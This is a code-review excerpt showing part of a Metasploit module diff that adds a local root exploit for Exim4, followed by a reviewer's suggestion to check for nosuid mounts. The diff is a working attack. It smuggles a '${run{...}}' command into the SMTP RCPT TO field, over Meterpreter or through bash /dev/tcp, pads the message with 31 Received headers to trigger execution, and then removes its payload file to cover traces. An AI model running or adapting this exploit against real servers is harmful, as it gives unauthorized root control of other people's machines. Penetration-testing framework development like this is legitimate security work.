modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb

```diff
@@ -0,0 +1,189 @@
+  end
+
+  def inject_payload(payload)
+    if session.type == 'meterpreter'
+      socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)
+      params = Rex::Socket::Parameters.new({
+        'PeerHost' => '127.0.0.1',
+        'PeerPort' => datastore['EXIMPORT']
+      })
+      socket = socket_subsystem.create_tcp_client_channel(params)
+      socket.gets
+      socket.puts("helo localhost\n")
+      socket.gets
+      socket.puts("mail from:<>\n")
+      socket.gets
+      socket.puts("rcpt to:<${run{#{payload}}}@localhost>\n")
+      socket.gets
+      socket.puts("data\n")
+      socket.gets
+      for i in (1..31)
+        socket.puts("Received: #{i}\n")
+      end
+      socket.puts(".\n")
+      socket.gets
+      socket.puts("quit\n")
+      socket.close
+      socket_subsystem.shutdown
+    else
+      res = cmd_exec("exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}")
+
+      cmd_exec('read -u 3 && echo $REPLY')
+      cmd_exec('echo "helo localhost" >&3')
+      cmd_exec('read -u 3 && echo $REPLY')
+      cmd_exec('echo "mail from:<>" >&3')
+      cmd_exec('read -u 3 && echo $REPLY')
+      cmd_exec("echo 'rcpt to:<${run{#{payload}}}@localhost>' >&3")
+      cmd_exec('read -u 3 && echo $REPLY')
+      cmd_exec('echo "data" >&3')
+      cmd_exec('read -u 3 && echo $REPLY')
+      for i in (1..31)
+        cmd_exec("echo 'Received: #{i}' >&3")
+      end
+      cmd_exec('echo "." >&3')
+      cmd_exec('read -u 3 && echo $REPLY')
+      cmd_exec('echo "quit" >&3')
+      cmd_exec('read -u 3 && echo $REPLY')
+      cmd_exec('exec 3<&-')
+    end
+
+    print_status('Payload sent, wait a few seconds...')
+    Rex.sleep(5)
+  end
+
+  def on_new_session(session)
+    super
+
+    if session.type == 'meterpreter'
+      session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
+      session.fs.file.rm(@payload_path)
+    else
+      session.shell_command_token("rm -f #{@payload_path}")
+    end
+
+    print_good("Check session #{session.name}, you should have a root shell!")
+  end
+
+  def check
+    exim = datastore['EXIMPATH'] ? datastore['EXIMPATH'] : 'exim'
+
+    res = cmd_exec("#{exim} -bV")
+    if res =~ /Exim version ([0-9\.]*) /i # Maybe improve the regex
+      version = Gem::Version.new($1)
+      vprint_status("Detected running exim version: #{version}")
+      if version >= target[:lower_version] && version <= target[:upper_version]
+        return CheckCode::Appears
+      else
+        return CheckCode::Safe
+      end
+    end
+
+    print_error('Couldn\'t retrieve exim version. You may want to set EXIMPATH.')
+    CheckCode::Unknown
+  end
+
+  def exploit
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
+      end
+    end
+
+    unless writable?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
+    end
+
```

Comment:
Check if the target directory is mounted with `nosuid` :

```suggestion

    if nosuid? base_dir
      fail_with(Failure::BadConfig, "#{base_dir} is mounted nosuid")
    end
```

You'll also need to import the `Linux::System` mixin for this check.

```ruby
  include Msf::Post::Linux::System
```